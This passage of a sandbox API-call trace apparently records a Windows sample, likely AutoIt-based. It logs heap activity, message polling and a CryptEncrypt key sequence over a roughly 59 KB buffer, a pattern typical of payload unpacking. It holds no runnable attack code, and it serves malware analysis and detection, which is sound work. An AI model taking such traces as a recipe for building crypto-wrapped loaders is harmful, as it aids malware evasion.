Size=0x8) returned 0x7da228 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.197] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.197] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.198] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.198] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.198] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.199] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.199] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xe765, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xe770) returned 1 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.199] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.200] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.200] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.200] CharLowerBuffW (in: lpsz="byte[59249]", cchLength=0xb | out: lpsz="byte[59249]") returned 0xb [0042.200] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.201] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.201] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.201] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x943778*, pdwDataLen=0x6ae220*=0xe765, dwBufLen=0xe770 | out: pbData=0x943778*, pdwDataLen=0x6ae220*=0xe770) returned 1 [0042.201] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.201] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.201] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.201] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.202] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.202] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.202] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.202] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.202] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.202] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.210] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.210] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.210] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.210] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.210] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.210] CryptDestroyKey (hKey=0x7c2280) returned 1 [0042.210] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.211] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.211] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.211] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 